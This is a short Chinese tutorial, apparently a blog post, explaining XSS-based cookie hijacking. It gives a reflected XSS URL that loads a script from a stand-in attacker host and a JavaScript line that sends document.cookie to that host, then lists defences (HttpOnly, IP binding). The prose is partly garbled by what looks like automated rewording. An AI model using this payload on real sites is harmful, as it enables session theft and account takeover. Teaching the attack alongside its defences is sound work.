有人就会问了:So,进入管理中央有又什么用呢?

进入管理中央就可以操作修正用户的个人信息,可以说是为所欲为。

xsscookiephpWeb平安XSS怎么实现Cookie 劫持如斯简略你的网站平安吗 Vue.js

有人就又问了:改就改吧,只要不改密码,随便改。

是的,现在大部分的网站,在用户修正密码时,须要用户输入原始密码,因此通过Cookie挟制,无法修正密码,但是如果黑客在你的管理中央,删博客,发帖,揭橥不当辞吐,你是不是就紧张?轻则丢失数据,重则被请去喝茶,是不是开始害怕了?

好了,下边我就开始理解一下,利用XSS,完成Cookie挟制的流程。

第一步:

首先,我们利用的XSS漏洞,加载一个远程的JS文件。

http://localhost:82/xxs-case1.php?param=<script src=http://www.hackerserver.com/xss.js><script>

第二步:

在xss.js里面,获取当前用户在当前网站的Cookie,并发送到恶意做事器。
代码如下:

var img=document.createElement("img");img.src="http://www.hackerserver.com/cookielog?"+escape(document.cookie);document.body.appendChild(img);

第三步:

由于,当前的Web运用中,大部分的都是用Cookie来保存用户的登录凭据的,因此可以利用挟制到的的Cookie,不须要密码登录 ,访问用户的管理中央。

总结

有人问了,Cookie挟制这么危险,有没有有效的防御方法,答案是肯定的。

(1)设置HttpOnly 标识。
给Cookie加上HttpOnly标识之后,恶意JS脚本就无法访问到浏览器里面存储的Cookie信息,从而有效的降落了Cookie被挟制的可能性。

(2)绑定客户端IP。
后台把用户的Cookie和用户登录时的客户端IP绑定在一起,如此一来,就算Cookie被挟制,黑客也无法利用挟制到的Cookie登任命户管理中央。